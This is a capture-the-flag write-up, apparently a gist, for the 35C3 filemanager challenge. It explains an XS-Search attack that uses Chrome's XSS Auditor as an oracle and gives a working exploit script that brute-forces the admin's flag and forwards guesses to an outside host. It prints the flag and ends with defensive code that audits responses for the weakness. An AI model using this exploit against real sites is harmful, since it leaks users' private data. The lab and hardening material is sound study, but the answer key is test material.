<body>
<!--
Briefly, we all know that the flag is stored as `file` in the admin account. Plus, the flag is in the format: 35C3_***
When we search the content of a file, if it does exist, there is a script which highlights the found word in yellow with <mark>.
For example: https://filemanager.appspot.com/search?q=def
<h1>abc</h1>
<pre>def</pre>
<script>
// highlight script: emitted by the server only when the search term was found,
// with the search term itself inlined into the script body
(()=>{
  for (let pre of document.getElementsByTagName('pre')) {
    let text = pre.innerHTML;
    let q = 'def';
    let idx = text.indexOf(q);
    pre.innerHTML = `${text.substr(0, idx)}<mark>${q}</mark>${text.substr(idx+q.length)}`;
  }
})();
</script>
Okay, now let's get to the XSS Auditor part.
Try this on Chrome (yes, we should, since the description says that the admin is using headless Chrome):
view-source:https://filemanager.appspot.com/search?q=def&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b
You can see the red alert, which means that XSS Auditor found an XSS vector in our URL (the `a` param) which also shows up in the page's content. But in fact it is *NOT XSS*; this is a side effect of the auditor.
We leverage its mechanism to detect whether there is a search result (guessing the flag) or not.
* To clarify: `a` is just a dummy parameter name; we just want XSS Auditor to see it as an XSS vector.
But how do we do that? Since XSS Auditor detects and blocks the page, it also redirects the page to `chrome-error://chromewebdata/`.
Now the trick comes in. By reading this post: https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning
I found out it's possible to detect if the browser redirects to another page.
Yep, and that's all.
We can guess the flag by performing XS-Search leveraging XSS Auditor.
-->
<script>
// search URL with a placeholder for the search term; the dummy `a` parameter carries a copy of the
// server's highlight script so that XSS Auditor treats the response as reflected XSS whenever that
// script is present, i.e. whenever the search term matched
var URL = 'https://filemanager.appspot.com/search?q={{search}}&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b';
// candidate characters for the next flag position
var charset = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^`{|}~';
// known prefix so far, carried across page reloads through the `brute` query parameter
var brute = new URLSearchParams(location.search).get('brute') || '35C3_';
function guess(i){
  var go = brute + charset[i];
  var x = document.createElement('iframe');
  x.name = 'blah';
  var calls = 0;
  x.onload = () => {
    calls++;
    if(calls > 1){
      // a 2nd onload means XSS Auditor blocked the page and redirected it to chrome-error://,
      // so the highlight script was present and the guessed prefix is correct
      // https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning
      console.log("GOT IT ==> ", go);
      location.href = 'http://deptrai.l4w.pw/35c3/go.html?brute='+escape(go);
      x.onload = ()=>{};
    }
    // navigate the frame to the same URL plus a fragment: a normally loaded page only changes its
    // fragment (no onload), while a frame sitting on chrome-error:// does a full load and fires onload again
    var anchor = document.createElement('a');
    anchor.target = x.name;
    anchor.href = x.src+'#';
    anchor.click();
    anchor = null;
  }
  x.src = URL.replace('{{search}}',go);
  document.body.appendChild(x);
  // no 2nd onload within a second: this character is wrong, move on to the next one
  setTimeout(() =>{
    document.body.removeChild(x);
    guess(i+1);
  },1000);
}
guess(0);
// FLAG: 35C3_xss_auditor_for_the_win
</script>
</body>
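The oracle in this writeup needs three things at once: the legacy XSS Auditor active in block mode, a page that can be framed, and an inline script that is only emitted when the search matches. The following response audit is an added example (not code from the writeup or the challenge) that checks a response for those three conditions and shows a hardened response beside the vulnerable shape. The header names are real; the sample bodies, header sets and the `/static/highlight.js` path are constructed for the example. Chrome removed the auditor in version 78, so the `X-XSS-Protection: 0` opt-out matters for older builds and other engines that still honour it.

```javascript
// Added example, not part of the writeup or the challenge: audit a search
// response for the three conditions the XSS Auditor oracle depends on.
// Header names are real; the sample responses below are constructed.

// Normalise a header object to lower-case names so lookups are case-insensitive.
function normalizeHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    out[name.toLowerCase()] = String(value).trim();
  }
  return out;
}

// True when the body carries an inline <script> with content and no src attribute.
// The auditor only compares request parameters against script that is actually
// inlined in the response, so a script loaded from an external file cannot be matched.
function hasInlineScript(body) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(body)) !== null) {
    const attrs = m[1];
    const content = m[2].trim();
    if (!/\bsrc\s*=/i.test(attrs) && content.length > 0) return true;
  }
  return false;
}

// Returns the list of weaknesses found; an empty list means the response
// cannot serve as this kind of oracle.
function auditSearchResponse(headers, body) {
  const h = normalizeHeaders(headers);
  const findings = [];

  // 1. The legacy auditor stays enabled unless the page opts out with "0".
  const xxp = h['x-xss-protection'];
  if (xxp === undefined || !/^0\b/.test(xxp)) findings.push('auditor-enabled');

  // 2. The page can be framed, which is how the writeup observes the second
  //    onload; X-Frame-Options or CSP frame-ancestors closes that.
  const xfo = h['x-frame-options'];
  const csp = h['content-security-policy'] || '';
  const framingBlocked =
    (xfo !== undefined && /^(deny|sameorigin)$/i.test(xfo)) ||
    /frame-ancestors\s+(?:'none'|'self')/i.test(csp);
  if (!framingBlocked) findings.push('frameable');

  // 3. Inline script that is only emitted on a match gives the auditor
  //    something to block on exactly when the search succeeds.
  if (hasInlineScript(body)) findings.push('inline-script');

  return findings;
}

// The leak needs all three conditions; fixing any one of them breaks it.
function isOracleCandidate(headers, body) {
  const f = auditSearchResponse(headers, body);
  return f.includes('auditor-enabled') && f.includes('frameable') && f.includes('inline-script');
}

// Constructed sample: the shape of the challenge's response when q matched.
const VULNERABLE_HEADERS = { 'Content-Type': 'text/html' };
const VULNERABLE_BODY =
  '<h1>abc</h1><pre>def</pre><script>(()=>{/* highlight q */})();</script>';

// Constructed sample of a hardened response: auditor disabled, framing denied,
// highlighting moved to an external file that reads the term from a data attribute.
const HARDENED_HEADERS = {
  'Content-Type': 'text/html',
  'X-XSS-Protection': '0',
  'Content-Security-Policy': "frame-ancestors 'none'",
};
const HARDENED_BODY =
  '<h1>abc</h1><pre data-q="def">def</pre><script src="/static/highlight.js"></script>';

console.log('vulnerable:', auditSearchResponse(VULNERABLE_HEADERS, VULNERABLE_BODY));
console.log('hardened:  ', auditSearchResponse(HARDENED_HEADERS, HARDENED_BODY));
```

Run it with Node to see the vulnerable sample report all three findings and the hardened sample report none. The point of `isOracleCandidate` is that any single fix is enough to break this particular leak, but the auditor opt-out and the framing restriction are the cheap, response-wide fixes; moving the highlight script out of the conditional inline block removes the match-dependent content that the auditor was keying on.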
X-Cotang commented Jan 10, 2019
Hic! Could you explain it in more detail, pro?? :)) Hoping for your guidance :v